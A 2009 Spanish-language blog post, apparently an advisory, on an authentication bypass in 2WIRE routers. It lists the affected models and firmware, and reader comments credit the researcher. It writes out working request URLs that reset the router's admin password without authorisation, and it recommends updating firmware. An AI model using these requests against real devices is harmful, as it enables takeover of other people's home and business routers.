Grave vulnerabilidad de Autentificación en routers 2WIRE

Ha sido publicada una vulnerabilidad de los routers 2WIRE en el cual puedes cambiar el password de Administrador si éste ya fué configurado.

Los modelos vulnerables son:

• 2Wire 2701 Gateway
• 2Wire 1800HW
• 2Wire 1701HG

Y los firmwares vulnerables:

• 5.29.51
• 3.17.5
• 3.7.1

Firmware NO VULNERABLE:
5.29.135.5

Para establecer una nueva contraseña si ésta ya fué establecida, simplemente vamos a ésta dirección:

http://gateway.2wire.net?xslt?page=CD35_SETUP_01

Si quieres resetear el password:

http://gateway.2wire.net/xslt?PAGE=CD35_SETUP_01_POST&password1=hkmhkmhkmhkmhkm

hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkh
kmhkmhkmhkmhkmhkmhkmhkm&password2=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkhkmhkmhkmhkmhkmhkmhkmhkm

Descargar video demostrativo.

Conclusión:

Los problemas con los routers 2WIRE continuan , y ésto afecta a grandes compañias que utilizan éste tipo de aparatos, lo más recomendable es comprar otro tipo de router ó actualizar el firmware de nuestro router 2WIRE.

Post Relacionados:

• Download Firmware 3.0 para iPhone y Ipod Touch
• Apache Vulnerabilidad DoS peticiones HTTP
• Tutorial JailBreak iPhone y iPod touch con Firmware 3.0
• Parchar Broadcom BCM94311MCG wlan mini-PCI para soporte de inyección
• Nuevo kernel 2.6.27 liberado!

Búsquedas hacia éste artículo:

• router 2wire
• 2wire router
• cambiar firmware 2wire 1800
• 2wire 1701
• router 2wire 27
• 2 wiere
• modelo routers 2wire
• administrador de router
• vulnerabilidad 2wire

• 2wire

• contraseña 2wire
• 2 wire
• vulnerabilidades 2wire
• 2wire 2701
• actualizar firmware modem 2wire 1701HG
• 2wire paso a paso quitar contraseña
• routers 2wire
• 2wire 1800hw etiqueta
• 2wire routers
• 2wire 1701HG

August 25, 2009 | Etiquetado en: hacking, Linux, Seguridad | 3 Comments

3 Comentarios »

RSS feed para los comentarios de esta entrada. TrackBack URI

1. Salu2.

   Esta vulnerabilidad ya tiene un tiempo anunciada. Pero creo que lo importante es que te falto un crédito a la persona que la descubrió (Pedro Joaquín) http://www.hakim.ws/ mejor conocido como hkm. Incluso lo tienes de alguna manera “mencionado” pero no haces referencia a su trabajo. (Dicho sea de paso, hkm fue ponente en la DEFCON este año)

   Comentario por driver — August 25, 2009 #

2. Así es, hkm http://www.hakim.ws es el responsable de esta investigación.

   Ya se encuentra publicado en el sitio de defcon el material de su participación.

   http://www.defcon.org/html/links/dc-archives/dc-17-archive.html#Joaquin

   Saludos.

   Comentario por DnB — September 17, 2009 #

3. Gracias driver por defender mi trabajo.

   Pueden entrar a http://www.hakim.ws para las ultimas vulnerabilidades de este dispositivo. Saludos,

   hkm

   Comentario por hkm — November 17, 2009 #

Dejar un comentario